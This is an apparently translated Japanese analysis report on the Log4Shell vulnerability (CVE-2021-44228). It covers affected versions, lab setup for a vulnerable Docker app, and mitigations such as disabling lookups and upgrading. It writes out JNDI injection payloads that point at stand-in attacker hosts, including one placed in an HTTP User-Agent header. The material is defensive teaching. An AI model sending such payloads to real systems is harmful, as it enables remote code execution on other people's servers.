
CVE-2021-44228
이글루코퍼레이션 원치현 Log4shell 分析レポート
CVE-2021-44228 Log4j は Apache ソフトウェア財団の無料オープンソースで、Java ベースのあらゆるアプリケーションで使用可能。様々な Java ベースのサービスのログ記録、JNDI データ及びオブジェクトを発見・参照するための Java LDAP 1389 Lookup。JNDI を介して見つけたリソースを使用する機能
脆弱サーバー起動用 Docker イメージファイルのダウンロード
sudo git clone
sudo docker build . -t vulnerable-app
新しく作成するイメージを vulnerable-app として、現在のディレクトリに Docker イメージをビルド作成
github.com/welk
未使用の脆弱なサーバーを終了
docker ps -a
実行中の Docker イメージ全体を確認
docker container ID を確認
Log4Shell(CVE-2021-44228)は Apache Log4j ライブラリで発見されたリモートコード実行(RCE)脆弱性です。
攻撃者は悪意のあるペイロードを使用して任意のコードを実行できる可能性があり、広範囲にわたる被害をもたらす可能性があります。
| 項目 | 説明 |
|---|---|
| 脆弱性名 | Log4Shell |
| CVE番号 | CVE-2021-44228 |
| 脆弱性の種類 | リモートコード実行(RCE) |
| 影響を受けるバージョン | Log4j 2.0-beta9 ~ 2.14.1 |
| パッチ適用済みバージョン | Log4j 2.15.0 以上 |
| 攻撃難易度 | 低 (簡単な文字列入力のみで悪用可能) |
| 深刻度 | 🔥 致命的 (CVSS 10.0) |
Log4Shell は JNDI(Java Naming and Directory Interface)ルックアップ機能の脆弱性を利用して、攻撃者がリモートサーバーで悪意のあるコードを実行できるようにします。
攻撃者は以下のような文字列をログに残すだけで脆弱性を悪用できます。
${jndi:ldap://attacker.com:1389/exploit}
Log4Shell 脆弱性は Log4j を使用する多くの企業やサービスに影響を与えました。
攻撃者は Minecraft のチャットウィンドウに以下の文字列を入力することでサーバーを掌握できました。
복사
편집
${jndi:ldap://attacker.com:1389/exploit}
サーバーがこれをログに記録すると、JNDI Lookup を介して攻撃者のサーバーで悪意のあるコードが実行されます。
HTTP リクエストの User-Agent、Referer、X-Forwarded-For など、ログに記録されるフィールドに悪意のあるペイロードを挿入します。
복사
편집
GET / HTTP/1.1
Host: victim.com
User-Agent: ${jndi:ldap://malicious.com:1389/exploit}
✅ セキュリティスキャナーの活用
✅ ログファイルの確認
✅ ネットワーク監視
✅ 即時対策
복사
편집
-Dlog4j2.formatMsgNoLookups=true
✅ 長期的なセキュリティ対策
| Log4j バージョン | 対応措置 |
|---|---|
| 2.0-beta9 ~ 2.14.1 | 脆弱、アップデートが必要 |
| 2.15.0 | デフォルトで JNDI Lookup を無効化 |
| 2.16.0 | JNDI 機能を完全に削除 |
| 2.17.0 | 追加のセキュリティ強化措置 |
✅ 最新バージョン(2.17.1 以上)へのアップデートを推奨!
Log4Shell(CVE-2021-44228)は近年最も深刻なセキュリティ脆弱性の一つと評価されています。 ✅ 脆弱なシステムを迅速にパッチし、継続的なセキュリティ監視を実施することが必須です。 ✅ Log4j を使用するすべてのアプリケーションでセキュリティチェックを実施する必要があります。